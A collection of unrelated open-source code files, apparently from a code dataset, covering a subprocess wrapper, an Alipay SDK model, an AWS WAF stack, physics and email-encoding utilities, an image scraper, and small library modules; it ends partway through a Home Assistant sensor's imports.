AppServer/google/appengine/tools/devappserver2/safe_subprocess.py | loftwah/appscale | 790 | 12685683 | <reponame>loftwah/appscale
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A thread-safe wrapper for the subprocess module."""
import logging
import subprocess
import sys
import tempfile
import threading
# Subprocess creation is not threadsafe in Python. See
# http://bugs.python.org/issue1731717.
_popen_lock = threading.Lock()
# The provided Python binary on OS X also requires _popen_lock be held while
# writing to and closing the stdin of the subprocess.
if sys.platform == 'darwin':
_SUBPROCESS_STDIN_IS_THREAD_HOSTILE = True
else:
_SUBPROCESS_STDIN_IS_THREAD_HOSTILE = False
def start_process(args, input_string='', env=None, cwd=None, stdout=None,
stderr=None):
"""Starts a subprocess like subprocess.Popen, but is threadsafe.
The value of input_string is passed to stdin of the subprocess, which is then
closed.
Args:
args: A string or sequence of strings containing the program arguments.
input_string: A string to pass to stdin of the subprocess.
env: A dict containing environment variables for the subprocess.
cwd: A string containing the directory to switch to before executing the
subprocess.
stdout: A file descriptor, file object or subprocess.PIPE to use for the
stdout descriptor for the subprocess.
stderr: A file descriptor, file object or subprocess.PIPE to use for the
stderr descriptor for the subprocess.
Returns:
A subprocess.Popen instance for the created subprocess.
"""
with _popen_lock:
logging.debug('Starting process %r with input=%r, env=%r, cwd=%r',
args, input_string, env, cwd)
p = subprocess.Popen(args, env=env, cwd=cwd, stdout=stdout, stderr=stderr,
stdin=subprocess.PIPE)
if _SUBPROCESS_STDIN_IS_THREAD_HOSTILE:
p.stdin.write(input_string)
p.stdin.close()
p.stdin = None
if not _SUBPROCESS_STDIN_IS_THREAD_HOSTILE:
p.stdin.write(input_string)
p.stdin.close()
p.stdin = None
return p
def start_process_file(args, input_string, env, cwd, stdin=None, stdout=None,
stderr=None):
"""Starts a subprocess thread safely with temporary files for communication.
An alternate version of start_process that allows for the preservation
of stdin and stdout by creating two files that can be used for communication
between the processes. The paths to these files are added to the command
line after any args provided by the caller. The first file is written with
the value of input_string and the second file is returned to the caller.
Args:
args: A string or sequence of strings containing the program arguments.
input_string: A string to pass to stdin of the subprocess.
env: A dict containing environment variables for the subprocess.
cwd: A string containing the directory to switch to before executing the
subprocess.
stdin: A file descriptor, file object or subprocess.PIPE to use for the
stdin descriptor for the subprocess.
stdout: A file descriptor, file object or subprocess.PIPE to use for the
stdout descriptor for the subprocess.
stderr: A file descriptor, file object or subprocess.PIPE to use for the
stderr descriptor for the subprocess.
Returns:
A subprocess.Popen instance for the created subprocess. In addition to
the standard attributes, an additional child_out attribute is attached
that references a NamedTemporaryFile that the child process may write
and this process may read; it is up to the caller to delete the file
(path available as p.child_out.name).
"""
# In addition to needing to control deletion time, we need delete=False
# in order to allow multiple files to open the process on Windows.
child_in = tempfile.NamedTemporaryFile(mode='wb', delete=False)
child_out = tempfile.NamedTemporaryFile(mode='rb', delete=False)
child_in.write(input_string)
child_in.close()
# pylint: disable=g-no-augmented-assignment
# += modifies the original args which we don't want.
args = args + [child_in.name, child_out.name]
with _popen_lock:
logging.debug('Starting process %r with input=%r, env=%r, cwd=%r',
args, input_string, env, cwd)
p = subprocess.Popen(args, env=env, cwd=cwd, stdin=stdin, stdout=stdout,
stderr=stderr)
p.child_out = child_out
return p
|
airmozilla/new/cron.py | mozilla/airmozilla | 115 | 12685690 | <gh_stars>100-1000
import cronjobs
from airmozilla.cronlogger.decorators import capture
from . import eventemails
@cronjobs.register
@capture
def send_new_event_emails():
eventemails.send_new_event_emails(verbose=True)
|
alipay/aop/api/domain/OrderItem.py | snowxmas/alipay-sdk-python-all | 213 | 12685692 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class OrderItem(object):
def __init__(self):
self._address = None
self._brand_name = None
self._category = None
self._city = None
self._city_code = None
self._commodity_id = None
self._contacts = None
self._creator = None
self._expire_date = None
self._merchant_name = None
self._merchant_pid = None
self._mini_app_id = None
self._mini_app_name = None
self._online_time = None
self._order_status = None
self._phone_no = None
self._province = None
self._shop_id = None
self._shop_name = None
self._shop_status = None
self._status = None
@property
def address(self):
return self._address
@address.setter
def address(self, value):
self._address = value
@property
def brand_name(self):
return self._brand_name
@brand_name.setter
def brand_name(self, value):
self._brand_name = value
@property
def category(self):
return self._category
@category.setter
def category(self, value):
self._category = value
@property
def city(self):
return self._city
@city.setter
def city(self, value):
self._city = value
@property
def city_code(self):
return self._city_code
@city_code.setter
def city_code(self, value):
self._city_code = value
@property
def commodity_id(self):
return self._commodity_id
@commodity_id.setter
def commodity_id(self, value):
self._commodity_id = value
@property
def contacts(self):
return self._contacts
@contacts.setter
def contacts(self, value):
self._contacts = value
@property
def creator(self):
return self._creator
@creator.setter
def creator(self, value):
self._creator = value
@property
def expire_date(self):
return self._expire_date
@expire_date.setter
def expire_date(self, value):
self._expire_date = value
@property
def merchant_name(self):
return self._merchant_name
@merchant_name.setter
def merchant_name(self, value):
self._merchant_name = value
@property
def merchant_pid(self):
return self._merchant_pid
@merchant_pid.setter
def merchant_pid(self, value):
self._merchant_pid = value
@property
def mini_app_id(self):
return self._mini_app_id
@mini_app_id.setter
def mini_app_id(self, value):
self._mini_app_id = value
@property
def mini_app_name(self):
return self._mini_app_name
@mini_app_name.setter
def mini_app_name(self, value):
self._mini_app_name = value
@property
def online_time(self):
return self._online_time
@online_time.setter
def online_time(self, value):
self._online_time = value
@property
def order_status(self):
return self._order_status
@order_status.setter
def order_status(self, value):
self._order_status = value
@property
def phone_no(self):
return self._phone_no
@phone_no.setter
def phone_no(self, value):
self._phone_no = value
@property
def province(self):
return self._province
@province.setter
def province(self, value):
self._province = value
@property
def shop_id(self):
return self._shop_id
@shop_id.setter
def shop_id(self, value):
self._shop_id = value
@property
def shop_name(self):
return self._shop_name
@shop_name.setter
def shop_name(self, value):
self._shop_name = value
@property
def shop_status(self):
return self._shop_status
@shop_status.setter
def shop_status(self, value):
self._shop_status = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
def to_alipay_dict(self):
params = dict()
if self.address:
if hasattr(self.address, 'to_alipay_dict'):
params['address'] = self.address.to_alipay_dict()
else:
params['address'] = self.address
if self.brand_name:
if hasattr(self.brand_name, 'to_alipay_dict'):
params['brand_name'] = self.brand_name.to_alipay_dict()
else:
params['brand_name'] = self.brand_name
if self.category:
if hasattr(self.category, 'to_alipay_dict'):
params['category'] = self.category.to_alipay_dict()
else:
params['category'] = self.category
if self.city:
if hasattr(self.city, 'to_alipay_dict'):
params['city'] = self.city.to_alipay_dict()
else:
params['city'] = self.city
if self.city_code:
if hasattr(self.city_code, 'to_alipay_dict'):
params['city_code'] = self.city_code.to_alipay_dict()
else:
params['city_code'] = self.city_code
if self.commodity_id:
if hasattr(self.commodity_id, 'to_alipay_dict'):
params['commodity_id'] = self.commodity_id.to_alipay_dict()
else:
params['commodity_id'] = self.commodity_id
if self.contacts:
if hasattr(self.contacts, 'to_alipay_dict'):
params['contacts'] = self.contacts.to_alipay_dict()
else:
params['contacts'] = self.contacts
if self.creator:
if hasattr(self.creator, 'to_alipay_dict'):
params['creator'] = self.creator.to_alipay_dict()
else:
params['creator'] = self.creator
if self.expire_date:
if hasattr(self.expire_date, 'to_alipay_dict'):
params['expire_date'] = self.expire_date.to_alipay_dict()
else:
params['expire_date'] = self.expire_date
if self.merchant_name:
if hasattr(self.merchant_name, 'to_alipay_dict'):
params['merchant_name'] = self.merchant_name.to_alipay_dict()
else:
params['merchant_name'] = self.merchant_name
if self.merchant_pid:
if hasattr(self.merchant_pid, 'to_alipay_dict'):
params['merchant_pid'] = self.merchant_pid.to_alipay_dict()
else:
params['merchant_pid'] = self.merchant_pid
if self.mini_app_id:
if hasattr(self.mini_app_id, 'to_alipay_dict'):
params['mini_app_id'] = self.mini_app_id.to_alipay_dict()
else:
params['mini_app_id'] = self.mini_app_id
if self.mini_app_name:
if hasattr(self.mini_app_name, 'to_alipay_dict'):
params['mini_app_name'] = self.mini_app_name.to_alipay_dict()
else:
params['mini_app_name'] = self.mini_app_name
if self.online_time:
if hasattr(self.online_time, 'to_alipay_dict'):
params['online_time'] = self.online_time.to_alipay_dict()
else:
params['online_time'] = self.online_time
if self.order_status:
if hasattr(self.order_status, 'to_alipay_dict'):
params['order_status'] = self.order_status.to_alipay_dict()
else:
params['order_status'] = self.order_status
if self.phone_no:
if hasattr(self.phone_no, 'to_alipay_dict'):
params['phone_no'] = self.phone_no.to_alipay_dict()
else:
params['phone_no'] = self.phone_no
if self.province:
if hasattr(self.province, 'to_alipay_dict'):
params['province'] = self.province.to_alipay_dict()
else:
params['province'] = self.province
if self.shop_id:
if hasattr(self.shop_id, 'to_alipay_dict'):
params['shop_id'] = self.shop_id.to_alipay_dict()
else:
params['shop_id'] = self.shop_id
if self.shop_name:
if hasattr(self.shop_name, 'to_alipay_dict'):
params['shop_name'] = self.shop_name.to_alipay_dict()
else:
params['shop_name'] = self.shop_name
if self.shop_status:
if hasattr(self.shop_status, 'to_alipay_dict'):
params['shop_status'] = self.shop_status.to_alipay_dict()
else:
params['shop_status'] = self.shop_status
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = OrderItem()
if 'address' in d:
o.address = d['address']
if 'brand_name' in d:
o.brand_name = d['brand_name']
if 'category' in d:
o.category = d['category']
if 'city' in d:
o.city = d['city']
if 'city_code' in d:
o.city_code = d['city_code']
if 'commodity_id' in d:
o.commodity_id = d['commodity_id']
if 'contacts' in d:
o.contacts = d['contacts']
if 'creator' in d:
o.creator = d['creator']
if 'expire_date' in d:
o.expire_date = d['expire_date']
if 'merchant_name' in d:
o.merchant_name = d['merchant_name']
if 'merchant_pid' in d:
o.merchant_pid = d['merchant_pid']
if 'mini_app_id' in d:
o.mini_app_id = d['mini_app_id']
if 'mini_app_name' in d:
o.mini_app_name = d['mini_app_name']
if 'online_time' in d:
o.online_time = d['online_time']
if 'order_status' in d:
o.order_status = d['order_status']
if 'phone_no' in d:
o.phone_no = d['phone_no']
if 'province' in d:
o.province = d['province']
if 'shop_id' in d:
o.shop_id = d['shop_id']
if 'shop_name' in d:
o.shop_name = d['shop_name']
if 'shop_status' in d:
o.shop_status = d['shop_status']
if 'status' in d:
o.status = d['status']
return o
|
the-waf-apigateway/python/the_waf_apigateway/waf.py | mttfarmer/serverless | 1,627 | 12685696 | from aws_cdk import (
aws_cloudformation as cfn,
aws_wafv2 as waf,
core,
)
class Waf(cfn.NestedStack):
def __init__(self, scope: core.Construct, id: str, target_arn, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
waf_rules = []
# 1, AWS general rules
aws_managed_rules = waf.CfnWebACL.RuleProperty(
name='AWS-AWSManagedRulesCommonRuleSet',
priority=1,
override_action=waf.CfnWebACL.OverrideActionProperty(none={}),
statement=waf.CfnWebACL.StatementOneProperty(
managed_rule_group_statement=waf.CfnWebACL.ManagedRuleGroupStatementProperty(
name='AWSManagedRulesCommonRuleSet',
vendor_name='AWS',
excluded_rules=[waf.CfnWebACL.ExcludedRuleProperty(name='SizeRestrictions_BODY')]
)
),
visibility_config=waf.CfnWebACL.VisibilityConfigProperty(
cloud_watch_metrics_enabled=True,
metric_name='awsCommonRules',
sampled_requests_enabled=True,
),
)
waf_rules.append(aws_managed_rules)
# 2, AWS AnonIPAddress
aws_anoniplist = waf.CfnWebACL.RuleProperty(
name='awsAnonymousIP',
priority=2,
override_action=waf.CfnWebACL.OverrideActionProperty(none={}),
statement=waf.CfnWebACL.StatementOneProperty(
managed_rule_group_statement=waf.CfnWebACL.ManagedRuleGroupStatementProperty(
name='AWSManagedRulesAnonymousIpList',
vendor_name='AWS',
excluded_rules=[]
)
),
visibility_config=waf.CfnWebACL.VisibilityConfigProperty(
cloud_watch_metrics_enabled=True,
metric_name='awsAnonymous',
sampled_requests_enabled=True,
)
)
waf_rules.append(aws_anoniplist)
# 3 AWS ip reputation List
aws_ip_rep_list = waf.CfnWebACL.RuleProperty(
name='aws_Ipreputation',
priority=3,
override_action=waf.CfnWebACL.OverrideActionProperty(none={}),
statement=waf.CfnWebACL.StatementOneProperty(
managed_rule_group_statement=waf.CfnWebACL.ManagedRuleGroupStatementProperty(
name='AWSManagedRulesAmazonIpReputationList',
vendor_name='AWS',
excluded_rules=[]
)
),
visibility_config=waf.CfnWebACL.VisibilityConfigProperty(
cloud_watch_metrics_enabled=True,
metric_name='aws_reputation',
sampled_requests_enabled=True,
)
)
waf_rules.append(aws_ip_rep_list)
# 4 GeoBlock NZ from accessing gateway
geoblock_rule = waf.CfnWebACL.RuleProperty(
name='geoblocking_rule',
priority=4,
action=waf.CfnWebACL.RuleActionProperty(block={}),
statement=waf.CfnWebACL.StatementOneProperty(
geo_match_statement=waf.CfnWebACL.GeoMatchStatementProperty(
country_codes=['NZ'],
)
),
visibility_config=waf.CfnWebACL.VisibilityConfigProperty(
cloud_watch_metrics_enabled=True,
metric_name='geoblock',
sampled_requests_enabled=True,
)
)
waf_rules.append(geoblock_rule)
# Create the Waf ACL
WebACL = waf.CfnWebACL(self, 'WebACL',
default_action=waf.CfnWebACL.DefaultActionProperty(
allow={}
),
scope="REGIONAL", # vs 'CLOUDFRONT'
visibility_config=waf.CfnWebACL.VisibilityConfigProperty(
cloud_watch_metrics_enabled=True,
metric_name='webACL',
sampled_requests_enabled=True
),
name='HelloWorldACL',
rules=waf_rules
)
# Associate it with the resource provided.
waf.CfnWebACLAssociation(self, 'WAFAssnAPI',
web_acl_arn=WebACL.attr_arn,
resource_arn=target_arn
)
|
DataFormats/FWLite/scripts/edmLumisInFiles.py | ckamtsikis/cmssw | 852 | 12685710 | <filename>DataFormats/FWLite/scripts/edmLumisInFiles.py<gh_stars>100-1000
#! /usr/bin/env python
from __future__ import print_function
from FWCore.PythonUtilities.LumiList import LumiList
import optparse
if __name__ == '__main__':
parser = optparse.OptionParser ("Usage: %prog [--options] edm1.root [edm2.root...]",
description='Runs over input EDM files and prints out a list of contained lumi sections')
parser.add_option ('--intLumi', dest='intLumi', action='store_true',
help='print out total recorded and delivered integrated luminosity')
parser.add_option ('--output', dest='output', type='string',
help='save lumi sections output to file OUTPUT')
(options, args) = parser.parse_args()
# put this here after parsing the arguments since ROOT likes to
# grab command line arguments even when it shouldn't.
from DataFormats.FWLite import Lumis, Handle
if not args:
raise RuntimeError("Must provide at least one input file")
# do we want to get the luminosity summary?
if options.intLumi:
handle = Handle ('LumiSummary')
label = ('lumiProducer')
else:
handle, lable = None, None
runsLumisDict = {}
lumis = Lumis (args)
delivered = recorded = 0
for lum in lumis:
runList = runsLumisDict.setdefault (lum.aux().run(), [])
runList.append( lum.aux().id().luminosityBlock() )
# get the summary and keep track of the totals
if options.intLumi:
lum.getByLabel (label, handle)
summary = handle.product()
delivered += summary.avgInsDelLumi()
recorded += summary.avgInsRecLumi()
# print out lumi sections in JSON format
jsonList = LumiList (runsAndLumis = runsLumisDict)
if options.output:
jsonList.writeJSON (options.output)
else:
print(jsonList)
# print out integrated luminosity numbers if requested
if options.intLumi:
print("\nNote: These numbers should be considered approximate. For official numbers, please use lumiCalc.py")
print("delivered %.1f mb, recorded %.1f mb" % \
(delivered, recorded))
|
tests/mime/message/headers/part_test.py | skshetry/flanker | 929 | 12685717 | # coding:utf-8
import flanker.mime.message.part as part
from nose.tools import eq_
STRINGS = (
# Some normal strings
(b'', ''),
(b'hello', 'hello'),
(b'''hello
there
world''', '''hello
there
world'''),
(b'''hello
there
world
''', '''hello
there
world
'''),
(b'\201\202\203', '=81=82=83'),
# Add some trailing MUST QUOTE strings
(b'hello ', 'hello=20'),
(b'hello\t', 'hello=09'),
# Some long lines. First, a single line of 108 characters
(b'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\xd8\xd9\xda\xdb\xdc\xdd\xde\xdfxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx',
'''xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=D8=D9=DA=DB=DC=DD=DE=DFx=
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'''),
# A line of exactly 76 characters, no soft line break should be needed
(b'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy',
'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy'),
# A line of 77 characters, forcing a soft line break at position 75,
# and a second line of exactly 2 characters (because the soft line
# break `=' sign counts against the line length limit).
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz',
'''zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=
zz'''),
# A line of 151 characters, forcing a soft line break at position 75,
# with a second line of exactly 76 characters and no trailing =
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz',
'''zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'''),
# A string containing a hard line break, but which the first line is
# 151 characters and the second line is exactly 76 characters. This
# should leave us with three lines, the first which has a soft line
# break, and which the second and third do not.
(b'''yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz''',
'''yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy=
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'''),
# Lines that end with space or tab should be quoted
(b'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy ',
'''yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy=
=20'''),
# Lines that end with a partial quoted character
(b'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy=y',
'''yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy=
=3Dy'''),
# Lines that lead with a dot '.' should have the dot quoted
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.z',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Ez'),
# Lines that end with a dot '.' are not quoted
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.zz',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.=\n' +
'zz'),
# Lines that lead with a dot '.' should have the dot quoted and cut
# if the quoted line is longer than 76 characters.
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Ezzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\nzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'zz'),
# Respect quoted characters when considering leading '.'
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2E=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=7F=\n' +
'=7F=7F=7F'),
# Should cut somewhere near the middle of the line
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.quick brown fox, quick brown cat, quick hot dog, quick read dog, quick white bird',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n'
'=2Equick brown fox, quick brown cat, qui=\n' +
'ck hot dog, quick read dog, quick whi=\n'
+ 'te bird'),
# Respect quoted character when considering where to cut
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.quick brown fox, quick brown cat\x7f\x7f\x7f\x7f\x7f, quick read dog, quick white bird',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Equick brown fox, quick brown cat=7F=7F=\n' +
'=7F=7F=7F, quick read dog, quick whi=\n' +
'te bird'),
# Avoid considering non quoted characters when cutting
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.quick brown fox, quick brown cat=20=================, quick read dog, quick white bird',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Equick brown fox, quick brown cat=3D20=\n' +
'=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=\n' +
'=3D=3D=3D=3D=3D, quick read dog, quick white bird'),
# Should quote leading '.' if the cut results in a '.' on the next line
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.quick brown fox, quick brown cat..................... quick read dog, quick white bird',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Equick brown fox, quick brown cat.....=\n' +
'=2E............... quick read dog, quic=\n' +
'k white bird'),
# Should quote :space if the cut results in a :space at the end of the next line
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.quick brown fox, quick brown cat quick read dog, quick white bird',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Equick brown fox, quick brown cat =20=\n' +
' quick read dog, quic=\n' +
'k white bird'),
# Should quote :tab if the cut results in a :tab at the end of the next line
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.quick brown fox, quick brown cat \t quick read dog, quick white bird',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Equick brown fox, quick brown cat =09=\n' +
' quick read dog, quic=\n' +
'k white bird'),
# Should avoid cutting in the middle of multiple quoted characters near the cut point
(b'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz' +
b'.foo. \xF0\x9F\x99\x82 also there is \xF0\x9F\x99\x82 more in \xF0\x9F\x99\x82 ' +
b'this \xF0\x9F\x99\x82 message</body></html>',
'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz=\n' +
'=2Efoo. =F0=9F=99=82 also there is =F0=9F=\n' +
'=99=82 more in =F0=9F=99=82 this =F0=\n'
'=9F=99=82 message</body></html>'),
)
def test_encode():
for p, e in STRINGS:
enc = part._encode_transfer_encoding('quoted-printable', p)
eq_(enc, e)
|
osr2mp4/ImageProcess/PrepareFrames/RankingScreens/RankingReplay.py | siveroo/osr2mp4-core | 103 | 12685734 | from osr2mp4.ImageProcess import imageproc
from osr2mp4.ImageProcess.PrepareFrames.YImage import YImage
rankingreplay = "pause-replay"
def prepare_rankingreplay(scale, settings):
img = YImage(rankingreplay, settings, scale).img
img = imageproc.newalpha(img, 0.4)
return [img]
|
sasila/system_normal/processor/mzitu_proccessor_regex.py | iiiusky/Sasila | 327 | 12685736 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from sasila.system_normal.spider.spider_core import SpiderCore
from sasila.system_normal.pipeline.pic_pipeline import PicPipeline
from sasila.system_normal.processor.base_processor import BaseProcessor, Rule, LinkExtractor
from sasila.system_normal.downloader.http.spider_request import Request
import os
import uuid
if sys.version_info < (3, 0):
reload(sys)
sys.setdefaultencoding('utf-8')
class MezituProcessor(BaseProcessor):
spider_id = 'mzitu'
spider_name = 'mzitu'
allowed_domains = ['mzitu.com', 'meizitu.net']
start_requests = [Request(url='http://www.mzitu.com/xinggan/')]
rules = (
Rule(LinkExtractor(regex_str=r"http://i.meizitu.net/\d{4}/\d{2}/[0-9a-z]+.jpg"),
callback="save", priority=3),
Rule(LinkExtractor(regex_str=r"http://www.mzitu.com/\d+"), priority=1),
Rule(LinkExtractor(regex_str=r"http://www.mzitu.com/\d+/\d+"), priority=2),
Rule(LinkExtractor(regex_str=r"http://www.mzitu.com/xinggan/page/\d+"), priority=0),
)
def save(self, response):
if response.m_response:
if not os.path.exists("img"):
os.mkdir("img")
with open("img/" + str(uuid.uuid1()) + ".jpg", 'wb') as fs:
fs.write(response.m_response.content)
print("download success!")
# if __name__ == '__main__':
# spider = SpiderCore(MezituProcessor(), batch_size=10).set_pipeline(PicPipeline()).start()
|
hc/lib/tests/test_string.py | karthikprabhu/healthchecks | 4,813 | 12685748 | from django.test import TestCase
from hc.lib.string import replace
class StringTestCase(TestCase):
def test_it_works(self):
result = replace("$A is $B", {"$A": "aaa", "$B": "bbb"})
self.assertEqual(result, "aaa is bbb")
def test_it_ignores_placeholders_in_values(self):
result = replace("$A is $B", {"$A": "$B", "$B": "$A"})
self.assertEqual(result, "$B is $A")
def test_it_ignores_overlapping_placeholders(self):
result = replace("$$AB", {"$A": "", "$B": "text"})
self.assertEqual(result, "$B")
def test_it_preserves_non_placeholder_dollar_signs(self):
result = replace("$3.50", {"$A": "text"})
self.assertEqual(result, "$3.50")
|
yargy/tagger.py | xepozz/yargy | 250 | 12685753 |
class Tagger(object):
tags = []
def __call__(self, tokens):
raise NotImplementedError
def check_tag(self, tag):
return tag in self.tags
class PassTagger(Tagger):
def __call__(self, tokens):
for token in tokens:
yield token
class TaggersComposition(Tagger):
def __init__(self, taggers):
self.taggers = taggers
def __call__(self, tokens):
for tagger in self.taggers:
tokens = tagger(tokens)
return tokens
def check_tag(self, tag):
return any(
_.check_tag(tag)
for _ in self.taggers
)
|
custom_components/reolink_dev/sensor.py | gasecki/Home-Assistant_Config | 163 | 12685762 | """This component provides support for Reolink IP VoD support."""
from urllib.parse import quote_plus
from dataclasses import dataclass
import datetime as dt
import asyncio
import logging
import os
from dateutil import relativedelta
from homeassistant.core import CALLBACK_TYPE, HomeAssistant
